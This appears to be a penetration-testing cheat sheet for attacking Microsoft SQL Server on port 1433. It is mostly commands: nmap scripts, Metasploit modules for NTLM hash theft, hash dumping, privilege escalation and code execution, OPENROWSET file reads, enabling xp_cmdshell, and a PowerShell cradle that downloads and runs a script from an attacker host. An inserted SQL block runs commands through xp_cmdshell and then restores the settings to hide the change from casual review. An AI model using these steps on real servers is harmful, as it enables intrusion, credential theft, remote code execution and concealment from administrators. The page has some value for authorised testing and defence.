🔢MS-SQL - port 1433
Techniques for exploiting Microsoft SQL Server services
Scan
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>
Metasploit modules
Note: these modules require valid credentials.
#NTLM theft
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer #Capture the SQL Server service account's NTLM hash; start Responder before running this module
#Info gathering
msf> use admin/mssql/mssql_enum
msf> use admin/mssql/mssql_enum_domain_accounts
msf> use admin/mssql/mssql_enum_sql_logins
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/scanner/mssql/mssql_hashdump
msf> use auxiliary/scanner/mssql/mssql_schemadump
msf> use auxiliary/admin/mssql/mssql_idf
#Privesc
msf> use exploit/windows/mssql/mssql_linkcrawler
msf> use admin/mssql/mssql_escalate_execute_as #If the user has IMPERSONATION privilege, this will try to escalate
msf> use admin/mssql/mssql_escalate_dbowner #Escalate from db_owner to sysadmin
#Code execution
msf> use admin/mssql/mssql_exec
msf> use exploit/windows/mssql/mssql_payload
#Add a new administrator login from a meterpreter session on the SQL Server host
msf> use windows/manage/mssql_local_auth_bypass
Connecting
From a Linux machine
sqsh -S <IP> -U <Username> -P <Password> -D <Database>
From a Windows machine
Download SSMS (SQL Server Management Studio)
https://learn.microsoft.com/en-us/sql/ssms/download-sql-server-management-studio-ssms
Reading local files (requires the ADMINISTER BULK OPERATIONS server permission, which sysadmin and bulkadmin hold)
SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
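The same read wrapped in a permission check and TRY/CATCH, so that a failure reports why (missing permission, access denied, file not found) instead of a bare client error. This is an added example, not code from the original page; it assumes the connected login holds ADMINISTER BULK OPERATIONS and uses the hosts path from above.

```sql
-- Added example (not from the original page): read a local file with
-- OPENROWSET(BULK ...) and report the exact error if it fails.
-- Assumption: the login has ADMINISTER BULK OPERATIONS (sysadmin/bulkadmin).
IF HAS_PERMS_BY_NAME(NULL, NULL, 'ADMINISTER BULK OPERATIONS') = 0
    PRINT 'Current login lacks ADMINISTER BULK OPERATIONS; OPENROWSET(BULK) will fail.';

BEGIN TRY
    DECLARE @content VARCHAR(MAX);

    -- SINGLE_CLOB returns the whole file as one VARCHAR(MAX) column named BulkColumn.
    SELECT @content = BulkColumn
    FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS f;

    -- Byte count first: zero bytes means an empty file, not a failed read.
    SELECT DATALENGTH(@content) AS bytes_read, @content AS content;
END TRY
BEGIN CATCH
    -- Surfaces the server-side reason: 4834 = missing bulk permission,
    -- 4861 = cannot open file (path, ACL, or service account access).
    SELECT ERROR_NUMBER() AS err, ERROR_MESSAGE() AS msg;
END CATCH
GO
```

Note that the file is opened by the SQL Server service account, not by the connected login, so a path the login could read interactively may still fail with "cannot bulk load" if the service account has no access to it.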
Code execution
Check (an error here means xp_cmdshell is disabled)
> xp_cmdshell 'whoami';
> go
Enable xp_cmdshell (requires sysadmin, or the ALTER SETTINGS server permission)
> EXEC SP_CONFIGURE 'xp_cmdshell' , 1;
> reconfigure;
> go
> xp_cmdshell 'whoami';
> go
Force enabling (if the previous step fails because xp_cmdshell is an advanced option, turn on 'show advanced options' first)
> EXEC SP_CONFIGURE 'show advanced options', 1;
> reconfigure;
> go
> EXEC SP_CONFIGURE 'xp_cmdshell' , 1;
> reconfigure;
> go
> xp_cmdshell 'whoami';
> go
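The enable/run/restore sequence above as a single batch. This is an added example, not code from the original page: it records the current values of both options, enables xp_cmdshell only when it is off, captures the command output in a table so it can be queried, and then puts the configuration back to what it was, which keeps the footprint in sys.configurations and the SQL Server log to a minimum. It assumes the login is sysadmin (or has ALTER SETTINGS).

```sql
-- Added example (not from the original page): enable xp_cmdshell only if
-- necessary, run a command, collect its output, then restore both settings.
-- Assumption: the login is sysadmin or holds ALTER SETTINGS.
DECLARE @adv INT, @xp INT;

-- Record the current state so it can be restored afterwards.
SELECT @adv = CONVERT(INT, value_in_use) FROM sys.configurations WHERE name = 'show advanced options';
SELECT @xp  = CONVERT(INT, value_in_use) FROM sys.configurations WHERE name = 'xp_cmdshell';

IF @xp = 0
BEGIN
    -- xp_cmdshell is an advanced option: sp_configure refuses to change it
    -- until 'show advanced options' is on.
    IF @adv = 0
    BEGIN
        EXEC sp_configure 'show advanced options', 1;
        RECONFIGURE;
    END
    EXEC sp_configure 'xp_cmdshell', 1;
    RECONFIGURE;
END

-- Capture output in a table variable instead of letting it scroll past
-- in the client; xp_cmdshell emits a trailing NULL row that is filtered out.
DECLARE @out TABLE (line NVARCHAR(4000));
INSERT INTO @out (line) EXEC master..xp_cmdshell 'whoami';
SELECT line FROM @out WHERE line IS NOT NULL;

-- Put the configuration back the way it was found (xp_cmdshell first,
-- because it can only be changed while advanced options are shown).
IF @xp = 0
BEGIN
    EXEC sp_configure 'xp_cmdshell', 0;
    RECONFIGURE;
END
IF @adv = 0
BEGIN
    EXEC sp_configure 'show advanced options', 0;
    RECONFIGURE;
END
GO
```

Every sp_configure change is written to the SQL Server error log ("Configuration option 'xp_cmdshell' changed from 0 to 1"), so restoring the original values hides the activity from a casual look at sys.configurations but not from log review.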
Download and execute a script from your host (PowerShell download cradle; in T-SQL the command must be a single-quoted string, with inner single quotes doubled)
> xp_cmdshell 'powershell.exe -exec bypass iex(new-object net.webclient).downloadstring(''http://<your ip>:<port>/script.ps1'')';
> go
With CrackMapExec
#Download a file from the target
$ crackmapexec mssql <target IP> -u 'username' -p 'password' --get-file Windows/file/path/file.txt local/file/path
#Upload a file to the target
$ crackmapexec mssql <target IP> -u 'username' -p 'password' --put-file local/file/path Windows/file/path/file.txt